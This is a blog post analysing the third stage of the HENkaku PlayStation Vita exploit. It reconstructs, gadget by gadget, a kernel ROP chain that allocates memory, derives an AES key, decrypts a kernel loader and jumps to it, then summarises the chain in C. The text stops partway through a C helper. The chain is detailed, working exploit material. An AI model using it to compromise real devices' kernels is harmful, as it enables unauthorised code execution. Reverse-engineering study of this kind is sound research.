Wednesday, October 19, 2016

HENkaku - Exploit teardown - Stage 3

Here it is, Stage 3, the last stage of HENkaku.
This was by far the toughest to crack, so, let's dive in!

HENkaku - Stage 3

In Stage 2, we analyzed how HENkaku exploits two distinct kernel bugs to achieve code execution: a memory leak bug (in the sceIoDevctl function) to defeat KASLR and a use-after-free (in the sceNetIoctl function) to break into the kernel and do ROP.
However, since the execution flow switches over to a ROP chain planted into the kernel, we still couldn't figure out what was happening next.

Like I mentioned in the previous write-up's ending note, dumping the kernel (more specifically, the SceSysmem module) was now necessary. Team molecule did not provide any additional vulnerability that we could use for this purpose, so, it was up to the participants to figure it out themselves.

I had already found a potential memory leak vulnerability while playing around with Stage 2 but, unfortunately, due to its nature (out-of-bounds read), it wasn't enough to reach the SceSysmem module.
Frustrated, I began looking for other plausible entry-points. It took me several attempts and required analyzing several key components of the Vita's system:
- Network:
    The SceNet module was the origin of the use-after-free and I already had an OOB read there, so, what else could be in there?
- Filesystem:
    The SceDriverUser module exposes a decent amount of unique system calls for the filesystem. Some of them crash. Can I leak memory here?
- Audio:
    Developers don't pay much attention to security when it comes to implementing media handling. Some specific audio handling features are taken care of by the kernel itself. Can I compromise it?
- Graphics:
    Just like with audio, graphics are a common source of flaws. The Vita has plenty of libraries with unique system calls for this (SceGpuEs4User, SceGxm, ScePaf). Will this help?
- Application:
    User applications are managed by modules that heavily communicate with the kernel (SceAppUtil and SceDriverUser via SceAppMgr calls). Perhaps this can be taken down?
Eventually, one of those gave me what I wanted and I was able to dump the Vita's entire kernel memory. After locating the SceSysmem module among the dumped binaries, I was able to solve the rest of the challenge.
On a side note, I did attempt blind ROP at first by relocating a few gadgets and taking wild guesses, but team molecule made sure it wouldn't be that easy. The gadgets' placement makes it very difficult to predict what each one will do.

Anyway, here is the result:
// Kernel ROP chain
scesysmem_base + 0x00000347
0x00(x_stack + 0x00008A8C) = scesysmem_base + 0x00000031 // PC
scesysmem_base + 0x00000031
0x00(x_stack + 0x00008A90) = 0x08106803 // R0
0x00(x_stack + 0x00008A94) = scesysmem_base + 0x0001EFF1 // PC
scesysmem_base + 0x0001EFF1
LSLS R0, R0, #1 -> R0 is 0x1020D006
0x00(x_stack + 0x00008A98) = 0x00000038 // R3
0x00(x_stack + 0x00008A9C) = scesysmem_base + 0x0001EFE1 // PC
scesysmem_base + 0x0001EFE1
MOV R1, R0 -> R1 is 0x1020D006
0x00(x_stack + 0x00008AA0) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008AA4) = scesysmem_base + 0x000039EB // PC
scesysmem_base + 0x000039EB
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008AA8) = scesysmem_base + 0x0001B571 // PC
scesysmem_base + 0x0001B571
LSLS R2, R0, #5 -> R2 is 0x041A00C0
0x00(x_stack + 0x00008AAC) = 0x00000000 // R3
0x00(x_stack + 0x00008AB0) = scesysmem_base + 0x00001E43 // PC
scesysmem_base + 0x00001E43
AND.W R2, R2, #0xF0000 -> R2 is 0x041A00C0 & 0xF0000 = 0xA0000
CMP.W R2, #0x40000
BEQ loc_AB1E50
MOVS R0, #0
POP {R3-R5,PC}
0x00(x_stack + 0x00008AB4) = 0x00000000 // R3
0x00(x_stack + 0x00008AB8) = scesysmem_base + 0x0001FC6D // R4
0x00(x_stack + 0x00008ABC) = scesysmem_base + 0x0000EA73 // R5
0x00(x_stack + 0x00008AC0) = scesysmem_base + 0x00000031 // PC
scesysmem_base + 0x00000031
0x00(x_stack + 0x00008AC4) = scesysmem_base + 0x00027913 // R0
0x00(x_stack + 0x00008AC8) = scesysmem_base + 0x0000A523 // PC
// Allocate kernel memblock (scesysmem_base + 0x00027913 == "Magic")
// kern_memblock_alloc("Magic", 0x1020D006, 0xA0000, 0x00000000, 0x00000000);
scesysmem_base + 0x0000A523
MOVS R4, #0
SUB SP, SP, #8
STR R4, [SP,#0x10+var_10]
BL sub_A6A384 // kern_memblock_alloc
ADD SP, SP, #8
0x00(x_stack + 0x00008ACC) = scesysmem_base + 0x00000347 // R4
0x00(x_stack + 0x00008AD0) = scesysmem_base + 0x00000CE3 // PC
scesysmem_base + 0x00000CE3
POP {R4-R7,PC}
0x00(x_stack + 0x00008AD4) = scesysmem_base + 0x00000347 // R4
0x00(x_stack + 0x00008AD8) = scesysmem_base + 0x0001F2B1 // R5
0x00(x_stack + 0x00008ADC) = scesysmem_base + 0x00000067 // R6
0x00(x_stack + 0x00008AE0) = scesysmem_base + 0x0000587F // R7
0x00(x_stack + 0x00008AE4) = scesysmem_base + 0x00019713 // PC
scesysmem_base + 0x00019713
ADD R3, SP, #0x28 -> Will modify stack!
scesysmem_base + 0x0000587F
MOVS R2, R0 -> R2 is memblock_id
0x00(x_stack + 0x00008AE8) = scesysmem_base + 0x00001605 // R4
0x00(x_stack + 0x00008AEC) = scesysmem_base + 0x00001E1D // PC
scesysmem_base + 0x00001E1D
MOV R0, R3 -> R3 is out_buf
0x00(x_stack + 0x00008AF0) = 0x00000000 // R4
0x00(x_stack + 0x00008AF4) = scesysmem_base + 0x0001EFE1 // PC
scesysmem_base + 0x0001EFE1
MOV R1, R0 -> R1 is out_buf
0x00(x_stack + 0x00008AF8) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008AFC) = scesysmem_base + 0x00001603 // PC
scesysmem_base + 0x00001603
MOV R0, R2 -> R0 is memblock_id
0x00(x_stack + 0x00008B00) = scesysmem_base + 0x0001F2B1 // R3
0x00(x_stack + 0x00008B04) = scesysmem_base + 0x00001F17 // PC
// Call kern_memblock_getaddr(memblock_id, out_buf);
// out_buf contains the memblock's base address
scesysmem_base + 0x00001F17
BL sub_A61EC8 // kern_memblock_getaddr
0x00(x_stack + 0x00008B08) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008B0C) = scesysmem_base + 0x00000031 // PC
scesysmem_base + 0x00000031
0x00(x_stack + 0x00008B10) = scesysmem_base + 0x0000B913 // R0 -> memblock_addr
0x00(x_stack + 0x00008B14) = scesysmem_base + 0x00023B61 // PC
scesysmem_base + 0x00023B61
MOV R7, R0 -> R7 is memblock_addr
MOVT R0, 0x8002
0x00(x_stack + 0x00008B18) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008B1C) = scesysmem_base + 0x000039EB // PC
scesysmem_base + 0x000039EB
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B20) = scesysmem_base + 0x000232EB // PC
scesysmem_base + 0x000232EB
MOVS R0, #8
0x00(x_stack + 0x00008B24) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008B28) = scesysmem_base + 0x0001B571 // PC
scesysmem_base + 0x0001B571
LSLS R2, R0, #5 -> R2 is (0x08 << 0x05) = 0x100
0x00(x_stack + 0x00008B2C) = scesysmem_base + 0x00023B61 // R3
0x00(x_stack + 0x00008B30) = scesysmem_base + 0x000232F1 // PC
scesysmem_base + 0x000232F1
MOVS R0, #0x80
0x00(x_stack + 0x00008B34) = scesysmem_base + 0x00001411 // R3
0x00(x_stack + 0x00008B38) = scesysmem_base + 0x00000AE1 // PC
scesysmem_base + 0x00000AE1
MOVS R1, R0 -> R1 is 0x80
0x00(x_stack + 0x00008B3C) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008B40) = scesysmem_base + 0x000050E9 // PC
scesysmem_base + 0x000050E9
MOV R0, R7 -> R0 is memblock_addr
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B44) = scesysmem_base + 0x00001411 // PC
scesysmem_base + 0x00001411
POP {R4,R5,PC}
0x00(x_stack + 0x00008B48) = 0x00000090 // R4
0x00(x_stack + 0x00008B4C) = scesysmem_base + 0x0001F2B1 // R5
0x00(x_stack + 0x00008B50) = scesysmem_base + 0x00012B11 // PC
scesysmem_base + 0x00012B11
ADDS.W R0, R0, R4,LSL#2 -> R0 is memblock_addr + 0x240
BEQ loc_A72ADE
ADD SP, SP, #8
0x00(x_stack + 0x00008B54) = scesysmem_base + 0x00000CE3 // SP
0x00(x_stack + 0x00008B58) = scesysmem_base + 0x000000D1 // SP + 0x04
0x00(x_stack + 0x00008B5C) = scesysmem_base + 0x00000347 // R4
0x00(x_stack + 0x00008B60) = scesysmem_base + 0x0001F2B1 // PC
scesysmem_base + 0x0001F2B1
EOR.W R9, R0, 0x40 -> R9 is (memblock_addr + 0x240 ^ 0x40) = memblock_addr + 0x200
0x00(x_stack + 0x00008B64) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008B68) = scesysmem_base + 0x000039EB // PC
scesysmem_base + 0x000039EB
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B6C) = scesysmem_base + 0x0001FDC5 // PC
scesysmem_base + 0x0001FDC5
MOV R3, LR -> R3 is scesysmem_base + 0x000039EB + 0x02
BLX R4 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B70) = scesysmem_base + 0x0001D8DB // PC
// AES_setkey(keybuf, type, size, key, 0);
// Call sub_A7D544(memblock_addr + 0x240, 0x80, 0x100, scesysmem_base + 0x39EB + 0x02, 0x00000000);
scesysmem_base + 0x0001D8DB
MOVS R4, #0
SUB SP, SP, #8
STR R4, [SP]
BL sub_A7D544
ADD SP, SP, #8
0x00(x_stack + 0x00008B74) = scesysmem_base + 0x00019399 // R4
0x00(x_stack + 0x00008B78) = scesysmem_base + 0x00019399 // PC
scesysmem_base + 0x00019399
MOV R0, R9 -> R0 is memblock_addr + 0x200
MOV R1, R4 -> R1 is scesysmem_base + 0x00019399
LDR R2, [SP,#0x38+var_30] -> R2 is scesysmem_base + 0x00000347
MOVS R3, #0 -> R3 is 0x00000000
BLX R5 -> R5 is scesysmem_base + 0x0001F2B1
scesysmem_base + 0x0001F2B1
EOR.W R9, R0, 0x40 -> R9 is (memblock_addr + 0x200 ^ 0x40) = memblock_addr + 0x240
0x00(x_stack + 0x00008B7C) = scesysmem_base + 0x00011C5F // R3
0x00(x_stack + 0x00008B80) = scesysmem_base + 0x00019399 // PC
scesysmem_base + 0x00019399
MOV R0, R9 -> R0 is memblock_addr + 0x240
MOV R1, R4 -> R1 is scesysmem_base + 0x00019399
LDR R2, [SP,#0x38+var_30] -> R2 is 0x00000000
MOVS R3, #0 -> R3 is 0x00000000
BLX R5 -> R5 is scesysmem_base + 0x0001F2B1
scesysmem_base + 0x0001F2B1
EOR.W R9, R0, 0x40 -> R9 is (memblock_addr + 0x240 ^ 0x40) = memblock_addr + 0x200
0x00(x_stack + 0x00008B84) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008B88) = scesysmem_base + 0x0000B913 // PC
scesysmem_base + 0x0000B913
MOVS R6, R0 -> R6 is memblock_addr + 0x240
ADD R0, R4 -> R0 is memblock_addr + 0x240 + scesysmem_base + 0x00019399
ADD R1, R2 -> R1 is scesysmem_base + 0x00019399 + 0x00000000
CMP R0, R1
MOVHI R0, #0 -> R0 is always bigger than R1 (likely a workaround gadget)
MOVLS R0, #1
ADD SP, SP, #8
0x00(x_stack + 0x00008B8C) = 0x00000000 // SP
0x00(x_stack + 0x00008B90) = scesysmem_base + 0x0001EFE1 // SP + 0x04
0x00(x_stack + 0x00008B94) = scesysmem_base + 0x00000347 // R4
0x00(x_stack + 0x00008B98) = scesysmem_base + 0x00001861 // PC
scesysmem_base + 0x00001861
MOVS R0, #0 -> R0 is 0
0x00(x_stack + 0x00008B9C) = scesysmem_base + 0x0001FC6D // R3
0x00(x_stack + 0x00008BA0) = scesysmem_base + 0x0001F2B1 // PC
scesysmem_base + 0x0001F2B1
EOR.W R9, R0, 0x40 -> R9 is (0x00 ^ 0x40) = 0x40
0x00(x_stack + 0x00008BA4) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008BA8) = scesysmem_base + 0x000039EB // PC
scesysmem_base + 0x000039EB
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008BAC) = scesysmem_base + 0x00019399 // PC
scesysmem_base + 0x00019399
MOV R0, R9 -> R0 is 0x40
MOV R1, R4 -> R1 is scesysmem_base + 0x00000347
LDR R2, [SP,#0x38+var_30] -> R2 is scesysmem_base + 0x00000347
MOVS R3, #0 -> R3 is 0x00000000
BLX R5 -> R5 is scesysmem_base + 0x0001F2B1
scesysmem_base + 0x0001F2B1
EOR.W R9, R0, 0x40 -> R9 is (0x40 ^ 0x40) = 0x00
0x00(x_stack + 0x00008BB0) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008BB4) = scesysmem_base + 0x00019399 // PC
scesysmem_base + 0x00019399
MOV R0, R9 -> R0 is 0x00
MOV R1, R4 -> R1 is scesysmem_base + 0x00000347
LDR R2, [SP,#0x38+var_30] -> R2 is scesysmem_base + 0x0001614D
MOVS R3, #0 -> R3 is 0x00000000
BLX R5 -> R5 is scesysmem_base + 0x0001F2B1
scesysmem_base + 0x0001F2B1
EOR.W R9, R0, 0x40 -> R9 is (0x00 ^ 0x40) = 0x40
0x00(x_stack + 0x00008BB8) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008BBC) = scesysmem_base + 0x000039EB // PC
scesysmem_base + 0x000039EB
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008BC0) = scesysmem_base + 0x0001614D // PC
scesysmem_base + 0x0001614D
ADDEQ R0, #0x10 -> R0 is 0x40 + 0x10 = 0x50
0x00(x_stack + 0x00008BC4) = scesysmem_base + 0x000233D3 // R3
0x00(x_stack + 0x00008BC8) = scesysmem_base + 0x0001F2B1 // PC
scesysmem_base + 0x0001F2B1
EOR.W R9, R0, 0x40 -> R9 is (0x50 ^ 0x40) = 0x10
0x00(x_stack + 0x00008BCC) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008BD0) = scesysmem_base + 0x000000AF // PC
scesysmem_base + 0x000000AF
NEGLS R0, R0 -> R0 is -(0x10) = 0xFFFFFFF0
0x00(x_stack + 0x00008BD4) = scesysmem_base + 0x00001605 // R3
0x00(x_stack + 0x00008BD8) = scesysmem_base + 0x0001EFE1 // PC
scesysmem_base + 0x0001EFE1
MOV R1, R0 -> R1 is 0xFFFFFFF0
0x00(x_stack + 0x00008BDC) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008BE0) = scesysmem_base + 0x000050E9 // PC
scesysmem_base + 0x000050E9
MOV R0, R7 -> R0 is memblock_addr
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008BE4) = scesysmem_base + 0x000039EB // PC
scesysmem_base + 0x000039EB
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008BE8) = scesysmem_base + 0x00001347 // PC
scesysmem_base + 0x00001347
MOV R2, R0 -> R2 is memblock_addr
0x00(x_stack + 0x00008BEC) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008BF0) = scesysmem_base + 0x000000B9 // PC
scesysmem_base + 0x000000B9
SUBS R0, R2, R1 -> R0 is memblock_addr - 0xFFFFFFF0
0x00(x_stack + 0x00008BF4) = scesysmem_base + 0x0001F2B1 // R3
0x00(x_stack + 0x00008BF8) = scesysmem_base + 0x00001347 // PC
scesysmem_base + 0x00001347
MOV R2, R0 -> R2 is memblock_addr - 0xFFFFFFF0
0x00(x_stack + 0x00008BFC) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008C00) = scesysmem_base + 0x0000039B // PC
scesysmem_base + 0x0000039B
0x00(x_stack + 0x00008C04) = kx_loader_addr // R4
0x00(x_stack + 0x00008C08) = scesysmem_base + 0x0001CB95 // PC
scesysmem_base + 0x0001CB95
SUBS R1, R4, R1 -> R1 is kx_loader_addr - 0xFFFFFFF0
0x00(x_stack + 0x00008C0C) = scesysmem_base + 0x0001EA93 // PC
scesysmem_base + 0x0001EA93
MOV R0, R6 -> R0 is memblock_addr + 0x240
0x00(x_stack + 0x00008C10) = scesysmem_base + 0x00001411 // PC
scesysmem_base + 0x00001411
POP {R4,R5,PC}
0x00(x_stack + 0x00008C14) = scesysmem_base + 0x00000347 // R4
0x00(x_stack + 0x00008C18) = scesysmem_base + 0x000209D7 // R5
0x00(x_stack + 0x00008C1C) = scesysmem_base + 0x000209D3 // PC
scesysmem_base + 0x000209D3
STR R5, [SP,#0x0C]
LDR R5, [SP,#0x38]
STR R5, [SP,#0x10]
BLX R4 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C20) = scesysmem_base + 0x00001411 // PC -> SP
scesysmem_base + 0x00001411
POP {R4,R5,PC}
0x00(x_stack + 0x00008C24) = scesysmem_base + 0x00000347 // R4 -> SP + 0x04
0x00(x_stack + 0x00008C28) = scesysmem_base + 0x0001BAF5 // R5 -> SP + 0x08
0x00(x_stack + 0x00008C2C) = scesysmem_base + 0x00001605 // PC -> SP + 0x0C -> scesysmem_base + 0x000209D7
scesysmem_base + 0x000209D7
STR R5, [SP,#0x10]
BLX R4 -> scesysmem_base + 0x00000347
ADD SP, SP, #0x1C
POP {R4,R5,PC}
0x00(x_stack + 0x00008C30) = scesysmem_base + 0x00000347 // PC -> SP + 0x10 -> scesysmem_base + 0x0000652B
scesysmem_base + 0x0000652B
ADD SP, SP, #0xC
0x00(x_stack + 0x00008C34) = scesysmem_base + 0x0000652B // SP
0x00(x_stack + 0x00008C38) = scesysmem_base + 0x00000347 // SP + 0x04
0x00(x_stack + 0x00008C3C) = scesysmem_base + 0x0001BAF5 // SP + 0x08
0x00(x_stack + 0x00008C40) = scesysmem_base + 0x00022A49 // PC -> SP + 0x10 -> scesysmem_base + 0x0001BAF5
scesysmem_base + 0x0001BAF5
// AES_decrypt
// Call sub_A7BAF4(memblock_addr + 0x240, kx_loader_addr - 0xFFFFFFF0, memblock_addr - 0xFFFFFFF0);
// Decrypt kx_loader_addr + 0x10 into memblock_addr + 0x10
0x00(x_stack + 0x00008C44) = 0xFFFFFEB0 // SP
0x00(x_stack + 0x00008C48) = scesysmem_base + 0x0000039B // SP + 0x04
0x00(x_stack + 0x00008C4C) = 0x00000040 // SP + 0x08
0x00(x_stack + 0x00008C50) = scesysmem_base + 0x00022A49 // SP + 0x0C
0x00(x_stack + 0x00008C54) = scesysmem_base + 0x00000347 // SP + 0x10
0x00(x_stack + 0x00008C58) = scesysmem_base + 0x0000652B // SP + 0x14 -> SP + 0x38
0x00(x_stack + 0x00008C5C) = scesysmem_base + 0x00000347 // SP + 0x18
0x00(x_stack + 0x00008C60) = scesysmem_base + 0x0000039B // R4 -> SP + 0x1C
0x00(x_stack + 0x00008C64) = 0x00000040 // R5
0x00(x_stack + 0x00008C68) = scesysmem_base + 0x00001605 // PC
scesysmem_base + 0x00001605
0x00(x_stack + 0x00008C6C) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008C70) = scesysmem_base + 0x0001D9EB // PC
scesysmem_base + 0x0001D9EB
ADD R2, SP, #0xBC -> R2 is SP + 0xBC
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C74) = scesysmem_base + 0x000039EB // PC
scesysmem_base + 0x000039EB
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C78) = scesysmem_base + 0x00000853 // PC
scesysmem_base + 0x00000853
POP {R0,R1,PC}
0x00(x_stack + 0x00008C7C) = scesysmem_base + 0x0001D8DB // R0
0x00(x_stack + 0x00008C80) = 0x00000038 // R1
0x00(x_stack + 0x00008C84) = scesysmem_base + 0x000000AB // PC
scesysmem_base + 0x000000AB
SUBS R2, R2, R1 -> R2 is SP + 0xBC - 0x38 = SP + 0x84
0x00(x_stack + 0x00008C88) = scesysmem_base + 0x000000D1 // R3
0x00(x_stack + 0x00008C8C) = scesysmem_base + 0x0002328B // PC
scesysmem_base + 0x0002328B
MOV R1, R2 -> R1 is SP + 0x84
0x00(x_stack + 0x00008C90) = scesysmem_base + 0x00022FCD // R4
0x00(x_stack + 0x00008C94) = scesysmem_base + 0x000000D1 // PC
scesysmem_base + 0x000000D1
MOV R4, R1 -> R4 is SP + 0x84
0x00(x_stack + 0x00008C98) = scesysmem_base + 0x0001EFF1 // R3
0x00(x_stack + 0x00008C9C) = scesysmem_base + 0x0002A117 // PC
scesysmem_base + 0x0002A117
POP {R2,R5,PC}
0x00(x_stack + 0x00008CA0) = scesysmem_base + 0x00000347 // R2
0x00(x_stack + 0x00008CA4) = scesysmem_base + 0x00001605 // R5
0x00(x_stack + 0x00008CA8) = scesysmem_base + 0x00019399 // PC
scesysmem_base + 0x00019399
MOV R0, R9 -> R0 is 0x10
MOV R1, R4 -> R1 is SP + 0x84
LDR R2, [SP,#0x38+var_30] -> R2 is scesysmem_base + 0x0001BF1F
MOVS R3, #0 -> R3 is 0x00000000
BLX R5 -> R5 is scesysmem_base + 0x00001605
scesysmem_base + 0x00001605
0x00(x_stack + 0x00008CAC) = scesysmem_base + 0x00000347 // R3 -> SP
0x00(x_stack + 0x00008CB0) = scesysmem_base + 0x000039EB // PC -> SP + 0x04
scesysmem_base + 0x000039EB
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008CB4) = scesysmem_base + 0x0001BF1F // PC -> SP + 0x08
scesysmem_base + 0x0001BF1F
MOV R2, R4 -> R2 is SP + 0x84
0x00(x_stack + 0x00008CB8) = 0xFFFFFEB0 // R3
0x00(x_stack + 0x00008CBC) = scesysmem_base + 0x0000039B // PC
scesysmem_base + 0x0000039B
0x00(x_stack + 0x00008CC0) = 0x00000240 // R4
0x00(x_stack + 0x00008CC4) = scesysmem_base + 0x00022A49 // PC
scesysmem_base + 0x00022A49
SUBS R0, R0, R4 -> R0 is 0x10 - 0x240
0x00(x_stack + 0x00008CC8) = scesysmem_base + 0x000039EB // R4
0x00(x_stack + 0x00008CCC) = scesysmem_base + 0x00003D73 // PC
scesysmem_base + 0x00003D73
MOVNE R0, R3 -> R0 is 0xFFFFFEB0
MOVEQ R0, #0
0x00(x_stack + 0x00008CD0) = 0x00000000 // R3
0x00(x_stack + 0x00008CD4) = scesysmem_base + 0x000021FD // PC
scesysmem_base + 0x000021FD
ADD R0, R2 -> R0 is 0xFFFFFEB0 + SP + 0x84 = SP - 0xCC
CMP R3, #0 -> R3 is 0x00000000
BNE loc_A621E2
POP {R4}
0x00(x_stack + 0x00008CD8) = scesysmem_base + 0x00000347 // R4
0x00(x_stack + 0x00008CDC) = scesysmem_base + 0x000050E9 // R3
0x00(x_stack + 0x00008CE0) = scesysmem_base + 0x00000AE1 // PC
scesysmem_base + 0x00000AE1
MOVS R1, R0 -> R1 is SP - 0xCC
0x00(x_stack + 0x00008CE4) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008CE8) = scesysmem_base + 0x0002A117 // PC
scesysmem_base + 0x0002A117
POP {R2,R5,PC}
0x00(x_stack + 0x00008CEC) = scesysmem_base + 0x00000347 // R2
0x00(x_stack + 0x00008CF0) = scesysmem_base + 0x0001F2B1 // R5
0x00(x_stack + 0x00008CF4) = scesysmem_base + 0x00000067 // PC
// Branch to kx_loader
scesysmem_base + 0x00000067
MOV SP, R1 -> SP is SP + 0x90
BLX R2 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008CF8) = scesysmem_base + 0x000039EB // R3
0x00(x_stack + 0x00008CFC) = scesysmem_base + 0x0001BF47 // PC
scesysmem_base + 0x0001BF47
MOVNE R1, #0
0x00(x_stack + 0x00008D00) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008D04) = scesysmem_base + 0x000050E9 // PC
scesysmem_base + 0x000050E9
MOV R0, R7 -> R0 is memblock_addr
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008D08) = scesysmem_base + 0x0000AF33 // PC
scesysmem_base + 0x0000AF33
MOV R4, R1 -> R4 is 0
MOV R5, R0 -> R5 is memblock_addr
BL sub_A7FBA8
MOV R1, R5 -> R1 is memblock_addr
MOV R2, R4 -> R2 is 0
MOVS R3, #0 -> R3 is 0
BL sub_A6CF34
POP {R3-R5,PC}
0x00(x_stack + 0x00008D0C) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008D10) = scesysmem_base + 0x0001D9EB // R4
0x00(x_stack + 0x00008D14) = second_payload // R5
0x00(x_stack + 0x00008D18) = scesysmem_base + 0x0001FC6D // PC
scesysmem_base + 0x0001FC6D
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008D1C) = scesysmem_base + 0x0000EA73 // PC
scesysmem_base + 0x0000EA73
MOV R3, R0 -> R3 is memblock_addr
0x00(x_stack + 0x00008D20) = scesysmem_base + 0x0000039B // R4
0x00(x_stack + 0x00008D24) = scesysmem_base + 0x00000853 // PC
scesysmem_base + 0x00000853
POP {R0,R1,PC}
0x00(x_stack + 0x00008D28) = 0xFFFFFFFF // R0
0x00(x_stack + 0x00008D2C) = 0x08106803 // R1
0x00(x_stack + 0x00008D30) = scesysmem_base + 0x000233D3 // PC
scesysmem_base + 0x000233D3
LSLS R2, R1, #1 -> R2 is (0x08106803 << 0x01) = 0x1020D006
0x00(x_stack + 0x00008D34) = scesysmem_base + 0x00000347 // R4
0x00(x_stack + 0x00008D38) = scesysmem_base + 0x00000433 // PC
scesysmem_base + 0x00000433
SUBS R1, R2, #1 -> R1 is (0x1020D006 - 0x01) = 0x1020D005
ANDS R0, R1 -> R0 is (0xFFFFFFFF & 0x1020D005) = 0x1020D005
BEQ loc_A60440
CLZ.W R0, R0 -> R0 is 3
SUB.W R4, R3, R0,LSR#3 -> R4 is memblock_addr - (0x03 >> 0x03) = memblock_addr
SUBS R0, R4, #1 -> R0 is memblock_addr - 0x01
0x00(x_stack + 0x00008D3C) = scesysmem_base + 0x000233D3 // R4
0x00(x_stack + 0x00008D40) = scesysmem_base + 0x000150A3 // PC
scesysmem_base + 0x000150A3
MOV R0, R3 -> R0 is memblock_addr
0x00(x_stack + 0x00008D44) = 0x00000000 // R3
0x00(x_stack + 0x00008D48) = scesysmem_base + 0x0000A74D // PC
scesysmem_base + 0x0000A74D
sub_A6A74C(memblock_addr, 0x1020D005);
0x00(x_stack + 0x00008D4C) = scesysmem_base + 0x00000000 // R4
0x00(x_stack + 0x00008D50) = scesysmem_base + 0x00000853 // PC
scesysmem_base + 0x00000853
POP {R0,R1,PC}
0x00(x_stack + 0x00008D54) = scesysmem_base + 0x0001BF1F // R0
0x00(x_stack + 0x00008D58) = 0x00000200 // R1
0x00(x_stack + 0x00008D5C) = scesysmem_base + 0x00001605 // PC
scesysmem_base + 0x00001605
0x00(x_stack + 0x00008D60) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008D64) = scesysmem_base + 0x000050E9 // PC
scesysmem_base + 0x000050E9
MOV R0, R7 -> R0 is memblock_addr
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008D68) = scesysmem_base + 0x00001605 // PC
scesysmem_base + 0x00001605
0x00(x_stack + 0x00008D6C) = scesysmem_base + 0x00022FCD // R3
0x00(x_stack + 0x00008D70) = scesysmem_base + 0x000039EB // PC
scesysmem_base + 0x000039EB
BLX R3 -> scesysmem_base + 0x00022FCD
scesysmem_base + 0x00022FCD
kern_flush_cache(memblock_addr, 0x00000200); // sub_A82FCC
0x00(x_stack + 0x00008D74) = scesysmem_base + 0x00000853 // R3
0x00(x_stack + 0x00008D78) = scesysmem_base + 0x00011C5F // PC
scesysmem_base + 0x00011C5F
BLX R7 -> Jump to memblock_addr

So, random comments and mistakes aside, this gives us a clear view of what the kernel ROP chain is doing:
// Allocate a new memory block
char* memblock_name = "Magic";
uint32_t memblock_type = 0x1020D006;
uint32_t memblock_size = 0xA0000;
void* memblock_opts = 0x00000000;
uint32_t memblock_id = kern_memblock_alloc(memblock_name, memblock_type, memblock_size, memblock_opts, 0);
// Retrieve the memory block's address into a buffer
uint32_t addr_buf[1];
kern_memblock_getaddr(memblock_id, addr_buf);
// Read out the address
uint32_t memblock_addr = addr_buf[0];
// Generate AES-256-ECB key using SceSysmem code!
void* k_buf = (void *)(memblock_addr + 0x240); // Output buffer to store the key
uint32_t key_type = 0x80; // Key type?
uint32_t key_size = 0x100; // Key size (0x80 is 128-bit, 0x100 is 256-bit)
void* key = (void *)(scesysmem_base + 0x39EB + 0x02); // The key is code!
uint32_t mode = 0x00000000; // Encryption mode (0 is ECB, 1 is CBC, 2 is CFB1)
AES_setkey(k_buf, key_type, key_size, key, mode);
// Decrypt HENkaku's kernel loader
void *in_buf = (void *)(kx_loader_addr + 0x10);
void *out_buf = (void *)(memblock_addr + 0x10);
AES_decrypt(k_buf, in_buf, out_buf);
// Execute the kx_loader
// Clean up?
sce_sysmemfordriver_call0(memblock_addr, 0, 0, 0);
sce_sysmemfordriver_call1(memblock_addr, 0x1020D005);
// Probably cache flush
sce_cpufordriver_call0(memblock_addr, 0x00000200);
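
None of the constants in this summary are stored in the chain as-is; they are built from gadget side effects. The short C sketch below replays that 32-bit arithmetic so it can be checked by hand. The function names are mine, chosen purely for illustration, and are not part of HENkaku or the Vita SDK.

```c
#include <stdint.h>

/* Memblock type: the chain loads 0x08106803 and shifts it left by one. */
uint32_t rop_memblock_type(void) {
    return (uint32_t)0x08106803u << 1;             /* 0x1020D006 */
}

/* Memblock size: (type << 5), truncated to 32 bits, masked with 0xF0000. */
uint32_t rop_memblock_size(void) {
    uint32_t r2 = rop_memblock_type() << 5;        /* 0x041A00C0 */
    return r2 & 0xF0000u;                          /* 0x000A0000 */
}

/* AES key size in bits: MOVS R0, #8 followed by LSLS R2, R0, #5. */
uint32_t rop_key_bits(void) {
    return (uint32_t)8u << 5;                      /* 0x100 */
}

/* Key buffer: memblock_addr + (0x90 << 2), i.e. memblock_addr + 0x240. */
uint32_t rop_keybuf_addr(uint32_t memblock_addr) {
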